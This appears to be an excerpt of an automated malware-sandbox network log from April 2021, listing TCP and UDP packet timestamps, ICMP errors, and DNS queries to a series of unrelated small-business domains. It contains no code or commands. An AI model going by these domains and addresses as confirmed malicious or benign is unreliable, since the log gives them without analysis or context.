                                                                      Apr 8, 2021 13:23:12.124249935 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124274015 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124366999 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.124711037 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124733925 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.124802113 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.125617027 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.125638962 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.125714064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.126405954 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.126508951 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.126562119 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.127289057 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.127310038 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.127353907 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.128182888 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.128226042 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.128273010 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.129050970 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.129069090 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.129148960 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.130053997 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.130074024 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.130122900 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.130846024 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131031990 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131112099 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.131644964 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131663084 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.131721973 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.136761904 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.136781931 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.136852980 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.136960030 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.136992931 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.137039900 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.137900114 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.137918949 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.137976885 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.138693094 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.138709068 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.138819933 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.138936996 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.155651093 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201056957 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201080084 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201095104 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201107979 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201154947 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201209068 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201267958 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201319933 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201428890 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201452017 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201487064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.201544046 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.201591969 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202033043 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202052116 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202068090 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202084064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202094078 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.202116013 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202159882 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.202994108 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203017950 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203032970 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203049898 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203067064 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.203124046 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.203597069 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203615904 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203632116 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203648090 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.203668118 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.203701973 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.204530954 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204561949 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204576969 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204593897 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.204602003 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.204639912 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.205282927 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205302000 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205327034 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205362082 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.205375910 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.205400944 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.205441952 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.206058025 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206084013 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206108093 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206135988 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206142902 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.206190109 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.206939936 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206963062 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.206984997 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.207006931 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.207022905 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.207053900 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.207663059 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.207722902 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210258007 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210284948 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210306883 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210354090 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210386992 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210400105 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210434914 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210577965 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210630894 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210643053 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210689068 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210714102 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210752010 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.210762978 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.210794926 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.213099003 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.213134050 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.213155985 CEST8049778216.239.36.21192.168.2.4
                                                                      Apr 8, 2021 13:23:12.213176012 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.213186026 CEST4977880192.168.2.4216.239.36.21
                                                                      Apr 8, 2021 13:23:12.213207960 CEST4977880192.168.2.4216.239.36.21

UDP Packets

Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Apr 8, 2021 13:21:13.343260050 CEST  59123        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:13.362189054 CEST  53           59123      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:13.465718985 CEST  54531        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:13.478009939 CEST  53           54531      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:19.525571108 CEST  49714        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:19.538274050 CEST  53           49714      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:21.111433983 CEST  58028        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:21.124315977 CEST  53           58028      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:21.868928909 CEST  53097        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:21.881489038 CEST  53           53097      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:22.641695976 CEST  49257        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:22.654412985 CEST  53           49257      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:23.398318052 CEST  62389        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:23.410882950 CEST  53           62389      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:24.547111988 CEST  49910        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:24.597687006 CEST  53           49910      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:25.536561966 CEST  55854        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:25.548954010 CEST  53           55854      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:26.429022074 CEST  64549        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:26.441953897 CEST  53           64549      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:27.105659008 CEST  63153        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:27.118328094 CEST  53           63153      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:28.168332100 CEST  52991        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:28.180963039 CEST  53           52991      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:28.969247103 CEST  53700        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:28.982186079 CEST  53           53700      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:29.601039886 CEST  51726        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:29.614193916 CEST  53           51726      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:30.808002949 CEST  56794        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:30.820566893 CEST  53           56794      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:31.515443087 CEST  56534        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:31.528103113 CEST  53           56534      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:32.282509089 CEST  56627        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:32.295661926 CEST  53           56627      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:33.046641111 CEST  56621        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:33.059272051 CEST  53           56621      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:33.705163002 CEST  63116        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:33.717596054 CEST  53           63116      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:43.289284945 CEST  64078        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:43.302186012 CEST  53           64078      8.8.8.8          192.168.2.4
Apr 8, 2021 13:21:57.012099981 CEST  64801        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:21:57.029795885 CEST  53           64801      8.8.8.8          192.168.2.4
Apr 8, 2021 13:22:07.081368923 CEST  61721        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:22:07.200592995 CEST  53           61721      8.8.8.8          192.168.2.4
Apr 8, 2021 13:22:07.438846111 CEST  51255        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:22:07.452756882 CEST  53           51255      8.8.8.8          192.168.2.4
Apr 8, 2021 13:22:09.531831026 CEST  61522        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:22:09.544730902 CEST  53           61522      8.8.8.8          192.168.2.4
Apr 8, 2021 13:22:10.179213047 CEST  52337        53         192.168.2.4      8.8.8.8
Apr 8, 2021 13:22:10.192509890 CEST  53           52337      8.8.8.8          192.168.2.4
                                                                      Apr 8, 2021 13:22:10.773109913 CEST5504653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:10.785067081 CEST53550468.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.014154911 CEST4961253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.041070938 CEST53496128.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.115132093 CEST4928553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.128747940 CEST53492858.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:11.542536974 CEST5060153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:11.556617975 CEST53506018.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.122549057 CEST6087553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.197274923 CEST53608758.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.456660032 CEST5644853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.511807919 CEST53564488.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:12.653134108 CEST5917253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:12.666035891 CEST53591728.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:13.690680981 CEST6242053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:13.703289032 CEST53624208.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:15.543047905 CEST6057953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:15.674556971 CEST53605798.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:16.029027939 CEST5018353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:16.133337975 CEST53501838.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:17.520349979 CEST6153153192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:17.701608896 CEST53615318.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:23.405999899 CEST4922853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:23.537040949 CEST5979453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:23.561050892 CEST53597948.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:23.711600065 CEST53492288.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:29.411036968 CEST5591653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:29.453022957 CEST53559168.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:34.461175919 CEST5275253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:34.608465910 CEST53527528.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:44.664508104 CEST6054253192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:44.780318975 CEST53605428.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:50.023492098 CEST6068953192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:50.072901964 CEST53606898.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:54.189313889 CEST6420653192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:54.202052116 CEST53642068.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:55.178546906 CEST5090453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:55.218827963 CEST53509048.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:22:55.892683983 CEST5752553192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:22:55.906056881 CEST53575258.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:00.396368027 CEST5381453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:00.417926073 CEST53538148.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:06.480061054 CEST5341853192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:06.521147013 CEST53534188.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:11.916363001 CEST6283353192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:11.993323088 CEST53628338.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:17.182508945 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:18.192764997 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:19.208389044 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:21.224176884 CEST5926053192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:22.195578098 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:23.204312086 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:24.221883059 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:26.237104893 CEST53592608.8.8.8192.168.2.4
                                                                      Apr 8, 2021 13:23:27.210115910 CEST4994453192.168.2.48.8.8.8
                                                                      Apr 8, 2021 13:23:27.627649069 CEST53499448.8.8.8192.168.2.4

                                                                      ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Apr 8, 2021 13:23:23.204497099 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
Apr 8, 2021 13:23:24.222014904 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable
Apr 8, 2021 13:23:26.237204075 CEST | 192.168.2.4 | 8.8.8.8 | cffe | (Port unreachable) | Destination Unreachable

                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 13:22:07.081368923 CEST | 192.168.2.4 | 8.8.8.8 | 0xd067 | Standard query (0) | www.1364kensington.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:12.456660032 CEST | 192.168.2.4 | 8.8.8.8 | 0x1d91 | Standard query (0) | www.essentials-trading.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:17.520349979 CEST | 192.168.2.4 | 8.8.8.8 | 0x8094 | Standard query (0) | www.luegomusic.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:23.405999899 CEST | 192.168.2.4 | 8.8.8.8 | 0xa149 | Standard query (0) | www.kf350.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:29.411036968 CEST | 192.168.2.4 | 8.8.8.8 | 0xdeb5 | Standard query (0) | www.hzmsbg.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:34.461175919 CEST | 192.168.2.4 | 8.8.8.8 | 0x1013 | Standard query (0) | www.quickeasybites.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:44.664508104 CEST | 192.168.2.4 | 8.8.8.8 | 0x1d30 | Standard query (0) | www.pierresplayhouse.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:50.023492098 CEST | 192.168.2.4 | 8.8.8.8 | 0x79ee | Standard query (0) | www.thecapitalhut.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:55.178546906 CEST | 192.168.2.4 | 8.8.8.8 | 0xfb00 | Standard query (0) | www.ssfgasia.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:00.396368027 CEST | 192.168.2.4 | 8.8.8.8 | 0xa297 | Standard query (0) | www.desertfoxindustries.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:06.480061054 CEST | 192.168.2.4 | 8.8.8.8 | 0x7cc0 | Standard query (0) | www.tennesseewheelrepair.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.916363001 CEST | 192.168.2.4 | 8.8.8.8 | 0xd53 | Standard query (0) | www.rootedwithlovejax.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:17.182508945 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:18.192764997 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:19.208389044 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:21.224176884 CEST | 192.168.2.4 | 8.8.8.8 | 0xefcc | Standard query (0) | www.coloradocouponclub.com | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:27.210115910 CEST | 192.168.2.4 | 8.8.8.8 | 0xa670 | Standard query (0) | www.lideresdeimmunocal.com | A (IP address) | IN (0x0001)

                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 13:22:07.200592995 CEST | 8.8.8.8 | 192.168.2.4 | 0xd067 | No error (0) | www.1364kensington.com | | 66.96.161.160 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:12.511807919 CEST | 8.8.8.8 | 192.168.2.4 | 0x1d91 | Name error (3) | www.essentials-trading.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:17.701608896 CEST | 8.8.8.8 | 192.168.2.4 | 0x8094 | No error (0) | www.luegomusic.com | luegomusic.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:17.701608896 CEST | 8.8.8.8 | 192.168.2.4 | 0x8094 | No error (0) | luegomusic.com | | 162.241.244.61 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:23.711600065 CEST | 8.8.8.8 | 192.168.2.4 | 0xa149 | No error (0) | www.kf350.com | | 107.178.142.156 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:29.453022957 CEST | 8.8.8.8 | 192.168.2.4 | 0xdeb5 | Name error (3) | www.hzmsbg.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:34.608465910 CEST | 8.8.8.8 | 192.168.2.4 | 0x1013 | Name error (3) | www.quickeasybites.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:44.780318975 CEST | 8.8.8.8 | 192.168.2.4 | 0x1d30 | No error (0) | www.pierresplayhouse.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | www.thecapitalhut.com | www11.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | www11.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:50.072901964 CEST | 8.8.8.8 | 192.168.2.4 | 0x79ee | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:22:55.218827963 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb00 | No error (0) | www.ssfgasia.com | ssfgasia.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:22:55.218827963 CEST | 8.8.8.8 | 192.168.2.4 | 0xfb00 | No error (0) | ssfgasia.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:00.417926073 CEST | 8.8.8.8 | 192.168.2.4 | 0xa297 | No error (0) | www.desertfoxindustries.com | desertfoxindustries.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:23:00.417926073 CEST | 8.8.8.8 | 192.168.2.4 | 0xa297 | No error (0) | desertfoxindustries.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:06.521147013 CEST | 8.8.8.8 | 192.168.2.4 | 0x7cc0 | No error (0) | www.tennesseewheelrepair.com | tennesseewheelrepair.com | | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 13:23:06.521147013 CEST | 8.8.8.8 | 192.168.2.4 | 0x7cc0 | No error (0) | tennesseewheelrepair.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.36.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.32.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.34.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:11.993323088 CEST | 8.8.8.8 | 192.168.2.4 | 0xd53 | No error (0) | www.rootedwithlovejax.com | | 216.239.38.21 | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:22.195578098 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:23.204312086 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:24.221883059 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 13:23:26.237104893 CEST | 8.8.8.8 | 192.168.2.4 | 0xefcc | Server failure (2) | www.coloradocouponclub.com | none | none | A (IP address) | IN (0x0001)
